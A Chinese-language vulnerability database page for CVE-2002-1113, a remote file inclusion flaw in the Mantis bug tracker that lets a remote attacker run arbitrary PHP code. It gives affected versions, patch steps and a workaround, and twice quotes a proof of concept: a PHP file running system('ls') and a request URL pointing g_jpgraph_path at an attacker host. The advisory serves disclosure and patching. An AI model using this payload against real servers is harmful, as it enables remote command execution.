CVE-2002-1113
CVSS7.5
发布时间 :2002-10-04 00:00:00
修订时间 :2016-10-17 22:23:43
NMCOES    

[原文]summary_graph_functions.php in Mantis 0.17.3 and earlier allows remote attackers to execute arbitrary PHP code by modifying the g_jpgraph_path parameter to reference the location of the PHP code.


[CNNVD]Mantis JpGraph库远程任意文件可包含漏洞(CNNVD-200210-027)

        
        Mantis是一款基于WEB的PHP编写MySQL后台支持的漏洞跟踪系统。
        Mantis的summary_graph_functions.php脚本对用户的输入缺少检查,远程攻击者可以利用这个漏洞包含远程服务器上的文件以WEB进程权限执行任意命令。
        Mantis使用JpGraph库来生成一些统计图,部分代码储存在一个包含文件(summary_graph_functions.php)中,这个文件调用include()函数加载JpGraph库。JpGraph库的地址是储存在一个配置文件中的,而summary_graph_functions.php并未加载此配置文件而是假设其他脚本已经在它之前加载了配置文件。
        因此summary_graph_functions.php直接将"g_jpgraph_path'"变量作为包含JpGraph库文件的路径来使用,攻击者可以调用这个变量来包含远程服务器上的恶意文件而导致在系统上以WEB用户执行任意命令或者导致系统文件内容泄露。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:mantis:mantis:0.15.10
cpe:/a:mantis:mantis:0.15.11
cpe:/a:mantis:mantis:0.15.12
cpe:/a:mantis:mantis:0.15.4
cpe:/a:mantis:mantis:0.17.2
cpe:/a:mantis:mantis:0.15.5
cpe:/a:mantis:mantis:0.17.3
cpe:/a:mantis:mantis:0.15.6
cpe:/a:mantis:mantis:0.15.7
cpe:/a:mantis:mantis:0.16.0
cpe:/a:mantis:mantis:0.16.1
cpe:/a:mantis:mantis:0.17.0
cpe:/a:mantis:mantis:0.15.3
cpe:/a:mantis:mantis:0.17.1
cpe:/a:mantis:mantis:0.15.8
cpe:/a:mantis:mantis:0.15.9

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1113
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1113
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-027
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=102927873301965&w=2
(UNKNOWN)  BUGTRAQ  20020813 mantisbt security flaw
http://marc.info/?l=bugtraq&m=102978924821040&w=2
(UNKNOWN)  BUGTRAQ  20020819 [Mantis Advisory/2002-04] Arbitrary code execution
http://www.debian.org/security/2002/dsa-153
(VENDOR_ADVISORY)  DEBIAN  DSA-153
http://www.securityfocus.com/bid/5504
(VENDOR_ADVISORY)  BID  5504
http://xforce.iss.net/xforce/xfdb/9829
(VENDOR_ADVISORY)  XF  mantis-include-remote-files(9829)

- 漏洞信息

Mantis JpGraph库远程任意文件可包含漏洞
高危 设计错误
2002-10-04 00:00:00 2005-05-13 00:00:00
远程  
        
        Mantis是一款基于WEB的PHP编写MySQL后台支持的漏洞跟踪系统。
        Mantis的summary_graph_functions.php脚本对用户的输入缺少检查,远程攻击者可以利用这个漏洞包含远程服务器上的文件以WEB进程权限执行任意命令。
        Mantis使用JpGraph库来生成一些统计图,部分代码储存在一个包含文件(summary_graph_functions.php)中,这个文件调用include()函数加载JpGraph库。JpGraph库的地址是储存在一个配置文件中的,而summary_graph_functions.php并未加载此配置文件而是假设其他脚本已经在它之前加载了配置文件。
        因此summary_graph_functions.php直接将"g_jpgraph_path'"变量作为包含JpGraph库文件的路径来使用,攻击者可以调用这个变量来包含远程服务器上的恶意文件而导致在系统上以WEB用户执行任意命令或者导致系统文件内容泄露。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 如果您无法立刻升级,也可以手工修复此漏洞,在summary_graph_functions.php的最开头增加下列语句进行检查:
         if ( isset($HTTP_GET_VARS['g_jpgraph_path']) ||
         isset($HTTP_POST_VARS['g_jpgraph_path']) ||
         isset($HTTP_COOKIE_VARS['g_jpgraph_path']) ) {
         exit;
         }
        注:0.17.4a之前的版本还存在其他的严重漏洞,因此CNNVD建议您还是尽快升级到最新版本。
        * 在Php.ini文件中设置allow_url_fopen为Off, 或者'register_globals' 为Off。
        厂商补丁:
        Debian
        ------
        Debian已经为此发布了一个安全公告(DSA-153-2)以及相应补丁:
        DSA-153-2:New mantis package fixes several vulnerabilities
        链接:
        http://www.debian.org/security/2002/dsa-153

        补丁下载:
        Debian GNU/Linux 3.0 alias woody
        - --------------------------------
         Source archives:
        
        http://security.debian.org/pool/updates/main/m/mantis/mantis_0.17.1-2.2.dsc

         Size/MD5 checksum: 572 b0e1d4b5e021afd1445497e79db30c99
        
        http://security.debian.org/pool/updates/main/m/mantis/mantis_0.17.1-2.2.diff.gz

         Size/MD5 checksum: 13992 808ef6b8552bfd50b9e1a0abb34620fd
        
        http://security.debian.org/pool/updates/main/m/mantis/mantis_0.17.1.orig.tar.gz

         Size/MD5 checksum: 220458 d8bac093eaf31ef5812e714db5c07f82
         Architecture independent components:
        
        http://security.debian.org/pool/updates/main/m/mantis/mantis_0.17.1-2.2_all.deb

         Size/MD5 checksum: 249206 3891cfe394de49d7e57a4b4ed8f7db6f
        补丁安装方法:
        1. 手工安装补丁包:
         首先,使用下面的命令来下载补丁软件:
         # wget url (url是补丁下载链接地址)
         然后,使用下面的命令来安装补丁:
         # dpkg -i file.deb (file是相应的补丁名)
        2. 使用apt-get自动安装补丁包:
         首先,使用下面的命令更新内部数据库:
         # apt-get update
        
         然后,使用下面的命令安装更新软件包:
         # apt-get upgrade
        Mantis
        ------
        目前厂商已经发布了0.17.4a以修复这个安全问题,请到厂商的主页下载:
        
        http://mantisbt.sourceforge.net/download.php3

- 漏洞信息 (21727)

Mantis 0.15.x/0.16/0.17.x JPGraph Remote File Include Command Execution Vulnerability (EDBID:21727)
php webapps
2002-08-19 Verified
0 Joao Gouveia
N/A [点击下载]
source: http://www.securityfocus.com/bid/5504/info

Mantis depends on include files to provide some functionality, such as dynamic generation of graphs. However, since Mantis does not properly validate the path to the include file, it is possible for attackers to specify an arbitrary path, either to a local file or a file on a remote server. 

Attackers may use this to include PHP files located on remote servers. Execution of arbitrary commands with the privileges of the webserver is the result of successful exploitation.

The attacker may create the following file (listings.txt) on a server they have access to:

<?php
system('ls');
exit;
?>

And then cause it to be included with the following request:

http://target/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F		

- 漏洞信息

4858
Mantis Arbitrary PHP File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Mantis Bugtracking System contains a flaw that may allow a malicious user to inject PHP code. The issue exists because Mantis fails to properly validate a variable used to call an included file. It is possible that the flaw may allow a remote attacker to induce PHP into including and processing remote files, that could be used to execute arbitrary commands on the server, resulting in a loss of integrity.

- 时间线

2002-08-13 2002-08-09
2002-08-13 Unknow

- 解决方案

Upgrade to version 0.17.4a or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Place the following code at the top of summary_graph_functions.php: if ( isset($HTTP_GET_VARS['g_jpgraph_path']) || isset($HTTP_POST_VARS['g_jpgraph_path']) || isset($HTTP_COOKIE_VARS['g_jpgraph_path']) ) { exit; }:

- 相关参考

- 漏洞作者

- 漏洞信息

Mantis JPGraph Remote File Include Command Execution Vulnerability
Design Error 5504
Yes No
2002-08-19 12:00:00 2009-07-11 03:56:00
Discoery of this issue is credited to Joao Gouveia <tharbad@kaotik.org>.

- 受影响的程序版本

Mantis Mantis 0.17.3
Mantis Mantis 0.17.2
Mantis Mantis 0.17.1
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Mantis Mantis 0.17 .0
Mantis Mantis 0.16.1
Mantis Mantis 0.16 .0
Mantis Mantis 0.15.12
Mantis Mantis 0.15.11
Mantis Mantis 0.15.10
Mantis Mantis 0.15.9
Mantis Mantis 0.15.8
Mantis Mantis 0.15.7
Mantis Mantis 0.15.6
Mantis Mantis 0.15.5
Mantis Mantis 0.15.4
Mantis Mantis 0.15.3
Mantis Mantis 0.17.4 a
Mantis Mantis 0.17.4

- 不受影响的程序版本

Mantis Mantis 0.17.4 a
Mantis Mantis 0.17.4

- 漏洞讨论

Mantis depends on include files to provide some functionality, such as dynamic generation of graphs. However, since Mantis does not properly validate the path to the include file, it is possible for attackers to specify an arbitrary path, either to a local file or a file on a remote server.

Attackers may use this to include PHP files located on remote servers. Execution of arbitrary commands with the privileges of the webserver is the result of successful exploitation.

- 漏洞利用

The following proof-of-concept was provided:

The attacker may create the following file (listings.txt) on a server they have access to:

&lt;?php
system('ls');
exit;
?&gt;

And then cause it to be included with the following request:

http://target/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F

- 解决方案

Exploitation of this and other remote file include issues may be limited by disabling both 'allow_url_fopen' and 'register_globals' in the local site PHP configuration.

This issue has been addressed in Mantis 0.17.4 and later. Versions prior to Mantis 0.15.3 are also not affected.

The vendor has announced that if an upgrade cannot be applied, the vulnerability can be addressing by inserting the following lines at the top of summary_graph_functions.php:

if ( isset($HTTP_GET_VARS['g_jpgraph_path']) ||
isset($HTTP_POST_VARS['g_jpgraph_path']) ||
isset($HTTP_COOKIE_VARS['g_jpgraph_path']) ) {
exit;
}:


Mantis Mantis 0.15.10

Mantis Mantis 0.15.11

Mantis Mantis 0.15.12

Mantis Mantis 0.15.3

Mantis Mantis 0.15.4

Mantis Mantis 0.15.5

Mantis Mantis 0.15.6

Mantis Mantis 0.15.7

Mantis Mantis 0.15.8

Mantis Mantis 0.15.9

Mantis Mantis 0.16 .0

Mantis Mantis 0.16.1

Mantis Mantis 0.17 .0

Mantis Mantis 0.17.1

Mantis Mantis 0.17.2

Mantis Mantis 0.17.3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站